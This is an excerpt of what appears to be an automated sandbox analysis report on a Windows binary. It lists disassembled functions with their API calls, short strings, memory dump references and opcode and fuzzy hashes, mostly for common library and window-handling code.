                                                                          • Opcode Fuzzy Hash: d1eb55f4e3508059701220c97caa69193f269bfbda721c11557e1dec88fc16ab
                                                                          • Instruction Fuzzy Hash: F71157B5B05304EFE3228F51EC0CF92BBBCEB00B00F10856AAA16D7454D7B1E9599BA1
                                                                          Function 00346FB7 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                          • String ID:
                                                                          • API String ID: 3016257755-0
                                                                          • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                          • Instruction ID: f618887dbf68de161a501d091d5114cda62c772b47e53bc0f54324af42ae9797
                                                                          • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                          • Instruction Fuzzy Hash: C6014B7244914ABBCF275E84DC01CEE3FA6BB19350B598455FA585C031D336E9B1AB81
                                                                          Function 0039B2C5 Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetWindowRect.USER32(?,?), ref: 0039B2E4
                                                                          • ScreenToClient.USER32(?,?), ref: 0039B2FC
                                                                          • ScreenToClient.USER32(?,?), ref: 0039B320
                                                                          • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0039B33B
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: ClientRectScreen$InvalidateWindow
                                                                          • String ID:
                                                                          • API String ID: 357397906-0
                                                                          • Opcode ID: 46e3526c743eaebf28dd69ea31c5e57fb677229234cd71ac65060d65483eea0e
                                                                          • Instruction ID: d71f7ad36e41948cf084f415a66ac8aaa08457ea6adc559af26ac4ddc5fedc8c
                                                                          • Opcode Fuzzy Hash: 46e3526c743eaebf28dd69ea31c5e57fb677229234cd71ac65060d65483eea0e
                                                                          • Instruction Fuzzy Hash: CC1143B9D00209EFDB41CFA9D9849EEFBB9FB08310F108166E914E3220D735AA658F50
                                                                          Function 00376BDA Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • EnterCriticalSection.KERNEL32(?), ref: 00376BE6
                                                                            • Part of subcall function 003776C4: _memset.LIBCMT ref: 003776F9
                                                                          • _memmove.LIBCMT ref: 00376C09
                                                                          • _memset.LIBCMT ref: 00376C16
                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 00376C26
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalSection_memset$EnterLeave_memmove
                                                                          • String ID:
                                                                          • API String ID: 48991266-0
                                                                          • Opcode ID: 316eb29c0ff3b0fca15c52521b92b9acc18f31eda03bef7744067b3276e78cc2
                                                                          • Instruction ID: db75ee829e9fe5c65d6e38b5dafffd93ab32ac9ceaf3caff0446d75436dfc2ff
                                                                          • Opcode Fuzzy Hash: 316eb29c0ff3b0fca15c52521b92b9acc18f31eda03bef7744067b3276e78cc2
                                                                          • Instruction Fuzzy Hash: 41F0543A200100ABCF066F55DC85A4ABB29EF45321F04C061FE089E227C735E811CBB4
                                                                          Function 00312218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetSysColor.USER32(00000008), ref: 00312231
                                                                          • SetTextColor.GDI32(?,000000FF), ref: 0031223B
                                                                          • SetBkMode.GDI32(?,00000001), ref: 00312250
                                                                          • GetStockObject.GDI32(00000005), ref: 00312258
                                                                          • GetWindowDC.USER32(?,00000000), ref: 0034BE83
                                                                          • GetPixel.GDI32(00000000,00000000,00000000), ref: 0034BE90
                                                                          • GetPixel.GDI32(00000000,?,00000000), ref: 0034BEA9
                                                                          • GetPixel.GDI32(00000000,00000000,?), ref: 0034BEC2
                                                                          • GetPixel.GDI32(00000000,?,?), ref: 0034BEE2
                                                                          • ReleaseDC.USER32(?,00000000), ref: 0034BEED
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                          • String ID:
                                                                          • API String ID: 1946975507-0
                                                                          • Opcode ID: 30d82d764c078ee377660e38088e6d84f9143654e2340eef7b1fe63a66783046
                                                                          • Instruction ID: 38e8c38f9998c8891eb68a828727f40ed9a681249f63f6f7c2dc6f823f3a0459
                                                                          • Opcode Fuzzy Hash: 30d82d764c078ee377660e38088e6d84f9143654e2340eef7b1fe63a66783046
                                                                          • Instruction Fuzzy Hash: 37E03932104244AEDB225F64FC0D7D87B54EB06332F118367FA69880E187B289A0DB52
                                                                          Function 00368712 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetCurrentThread.KERNEL32 ref: 0036871B
                                                                          • OpenThreadToken.ADVAPI32(00000000,?,?,?,003682E6), ref: 00368722
                                                                          • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,003682E6), ref: 0036872F
                                                                          • OpenProcessToken.ADVAPI32(00000000,?,?,?,003682E6), ref: 00368736
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentOpenProcessThreadToken
                                                                          • String ID:
                                                                          • API String ID: 3974789173-0
                                                                          • Opcode ID: 0be39addefd84db6bff24ea42c5a8a332a3ed9ebcb6a651b2643d7a12c4b592b
                                                                          • Instruction ID: b514e803eff35e83b3bbf3fe3eb3e21e6e4bb243ecfc87743f07018e35bdb803
                                                                          • Opcode Fuzzy Hash: 0be39addefd84db6bff24ea42c5a8a332a3ed9ebcb6a651b2643d7a12c4b592b
                                                                          • Instruction Fuzzy Hash: 81E086366112119FD7215FB09D0DB563BACEF58791F158829B285C9044DA758451C760
                                                                          Function 00316240 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 317COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: %:
                                                                          • API String ID: 0-3402538441
                                                                          • Opcode ID: 3e40a82a5adeb4443a1a03bc00911b97b5acf5a1e2842bff751db8e09eebcd48
                                                                          • Instruction ID: 09a186fddfc601f66f551f725e3c2b0e0066af4773a77fd65249d091dd6979a4
                                                                          • Opcode Fuzzy Hash: 3e40a82a5adeb4443a1a03bc00911b97b5acf5a1e2842bff751db8e09eebcd48
                                                                          • Instruction Fuzzy Hash: 48B19F759001099BCF1AEFD8C8869FEB7B9EF4C310F144426E912AB191DB349EC6CB91
                                                                          Function 0038AEA2 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 313COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: __itow_s
                                                                          • String ID: xb=$xb=
                                                                          • API String ID: 3653519197-611833825
                                                                          • Opcode ID: a85b867efca3ad75574f31a042a15a6ede3f892e4fae1bdc589c3e7c406ec82d
                                                                          • Instruction ID: aa4129a54c4ede398fa2ee9e92abf0ba5a8a7217a084b6e2379ebe2e62e278f9
                                                                          • Opcode Fuzzy Hash: a85b867efca3ad75574f31a042a15a6ede3f892e4fae1bdc589c3e7c406ec82d
                                                                          • Instruction Fuzzy Hash: EFB17070A0020AEFDB16EF54C895EEAB7B9FF58300F14849AF9459F252DB30E985CB50
                                                                          Function 0037AFAC Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 0032FC86: _wcscpy.LIBCMT ref: 0032FCA9
                                                                            • Part of subcall function 00319837: __itow.LIBCMT ref: 00319862
                                                                            • Part of subcall function 00319837: __swprintf.LIBCMT ref: 003198AC
                                                                          • __wcsnicmp.LIBCMT ref: 0037B02D
                                                                          • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0037B0F6
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                          • String ID: LPT
                                                                          • API String ID: 3222508074-1350329615
                                                                          • Opcode ID: 8ea5bbb9b4d7f1a77de5478220c140b25972541319cd089034c582ff56841ab4
                                                                          • Instruction ID: 0027723ea6620bf975960c5e73db92122f5104951db78b9eedbf488c33648948
                                                                          • Opcode Fuzzy Hash: 8ea5bbb9b4d7f1a77de5478220c140b25972541319cd089034c582ff56841ab4
                                                                          • Instruction Fuzzy Hash: 92617375A00215AFCB1ADF54C895FEEF7B8EF08310F11806AF91AAB251D774AE84CB50
                                                                          Function 00322957 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • Sleep.KERNEL32(00000000), ref: 00322968
                                                                          • GlobalMemoryStatusEx.KERNEL32(?), ref: 00322981
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: GlobalMemorySleepStatus
                                                                          • String ID: @
                                                                          • API String ID: 2783356886-2766056989
                                                                          • Opcode ID: b1bacf20a5b5a413dd62c4914e4bffe48293d0b579bb8514bdf3b0e6dfc15da3
                                                                          • Instruction ID: e0d535a67d7321787f17c639e58829f1efa821a650e0c77cb1cf49f5b7b8bf84
                                                                          • Opcode Fuzzy Hash: b1bacf20a5b5a413dd62c4914e4bffe48293d0b579bb8514bdf3b0e6dfc15da3
                                                                          • Instruction Fuzzy Hash: 9B513572508744ABD721EF10D886BEBBBE8FF89344F41885DF2D8450A1DB318569CB6A
                                                                          Function 00379734 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00314F0B: __fread_nolock.LIBCMT ref: 00314F29
                                                                          • _wcscmp.LIBCMT ref: 00379824
                                                                          • _wcscmp.LIBCMT ref: 00379837
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: _wcscmp$__fread_nolock
                                                                          • String ID: FILE
                                                                          • API String ID: 4029003684-3121273764
                                                                          • Opcode ID: 037ce1744941ef66e22f5ec7e62958de3255cd99c51e1613da18cb306d567127
                                                                          • Instruction ID: 2ed50ef8657456ba36eae553c0568f5cc16e8f89ee1c5e7128488a70f81ab95a
                                                                          • Opcode Fuzzy Hash: 037ce1744941ef66e22f5ec7e62958de3255cd99c51e1613da18cb306d567127
                                                                          • Instruction Fuzzy Hash: D041E631A00209BADF269EA4CC45FEFB7BDDF89710F01406AF904EB180DA759A458B61
                                                                          Function 00350574 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 115COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: ClearVariant
                                                                          • String ID: Dd=$Dd=
                                                                          • API String ID: 1473721057-3871752360
                                                                          • Opcode ID: e00e16a31919079ee1e5ae1d66abd511a0e093c03b6ab0baf1fb5c5c22fa30b0
                                                                          • Instruction ID: ace6c896c057a2ef8342e6ed908de88f5e8fbdd58d1e6dc82af2e459125e6f93
                                                                          • Opcode Fuzzy Hash: e00e16a31919079ee1e5ae1d66abd511a0e093c03b6ab0baf1fb5c5c22fa30b0
                                                                          • Instruction Fuzzy Hash: FD51237860A7419FD75ACF19C480A9ABBF1BB99351F55881DE8858B321D732EC81CF42
                                                                          Function 0038258E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • _memset.LIBCMT ref: 0038259E
                                                                          • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 003825D4
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: CrackInternet_memset
                                                                          • String ID: |
                                                                          • API String ID: 1413715105-2343686810
                                                                          • Opcode ID: 4f29b26f554bd245ea5c91eb3e39cfc4ca89a975005eb25d2dc2412d396b5f34
                                                                          • Instruction ID: b1bb59d59ae438f6350418199ac8923c6f860e019894264667cc9780e3ba1bd1
                                                                          • Opcode Fuzzy Hash: 4f29b26f554bd245ea5c91eb3e39cfc4ca89a975005eb25d2dc2412d396b5f34
                                                                          • Instruction Fuzzy Hash: 31310771800219EBCF06EFA1CC85EEEBFB8FF08350F140059F955AA162EB315996DB60
                                                                          Function 00397A71 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00397B61
                                                                          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00397B76
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend
                                                                          • String ID: '
                                                                          • API String ID: 3850602802-1997036262
                                                                          • Opcode ID: 455c6a483d2a08daba3bbd581d781f4393fd7600e22dd0d51635f9f6ffac5ec2
                                                                          • Instruction ID: 5c6ae57e034e37732457cd5993885fd3c51ac9c44fef141a01a9e62179377e67
                                                                          • Opcode Fuzzy Hash: 455c6a483d2a08daba3bbd581d781f4393fd7600e22dd0d51635f9f6ffac5ec2
                                                                          • Instruction Fuzzy Hash: 0A410875A152099FDF15CF64D881BDABBB9FF08300F11016AE904EB391D770A951CF90
                                                                          Function 00396A63 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • DestroyWindow.USER32(?,?,?,?), ref: 00396B17
                                                                          • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00396B53
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Window$DestroyMove
                                                                          • String ID: static
                                                                          • API String ID: 2139405536-2160076837
                                                                          • Opcode ID: dbb219dc1955b09dd9df54c2a7d50c43d7776a99cbdb7c826e5f4dc6ac13c938
                                                                          • Instruction ID: 178d866640434f40083863bf50c962aab4f888d6e58ed1618a43efb1bea07c56
                                                                          • Opcode Fuzzy Hash: dbb219dc1955b09dd9df54c2a7d50c43d7776a99cbdb7c826e5f4dc6ac13c938
                                                                          • Instruction Fuzzy Hash: A2318D71200604AEDF129F69DC81BFB73A9FF48760F11861AF9A9D7190DA31AC81C760
                                                                          Function 003728A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • _memset.LIBCMT ref: 00372911
                                                                          • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0037294C
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: InfoItemMenu_memset
                                                                          • String ID: 0
                                                                          • API String ID: 2223754486-4108050209
                                                                          • Opcode ID: 8b0561c48f92507d5818bd2be9c565af09f4c227ee2d0b3c9a3679555f1c09ec
                                                                          • Instruction ID: 05e97bc5270d204a55df3e0b6cfae8fee3d29bf66c2dc774d1795632277527a8
                                                                          • Opcode Fuzzy Hash: 8b0561c48f92507d5818bd2be9c565af09f4c227ee2d0b3c9a3679555f1c09ec
                                                                          • Instruction Fuzzy Hash: BA31E9316003059FDB37CF58D885BAFBBF8EF46350F198019EA89A61A0D7749950DB51
                                                                          Function 003966D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00396761
                                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0039676C
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend
                                                                          • String ID: Combobox
                                                                          • API String ID: 3850602802-2096851135
                                                                          • Opcode ID: 296cc6c3fda535dfad28d76f4470338c3c668b2fd50b7ad29d4bfb2a44df57e6
                                                                          • Instruction ID: 743ae9e80441a08abbd1c71e44c3e737cb79d5cab899fae8b223ba3b5cc0696c
                                                                          • Opcode Fuzzy Hash: 296cc6c3fda535dfad28d76f4470338c3c668b2fd50b7ad29d4bfb2a44df57e6
                                                                          • Instruction Fuzzy Hash: 2F118275211208AFEF179F94DC82EFB376EEB493A8F124129F9149B290D671DC5187A0
                                                                          Function 00396C07 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00311D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00311D73
                                                                            • Part of subcall function 00311D35: GetStockObject.GDI32(00000011), ref: 00311D87
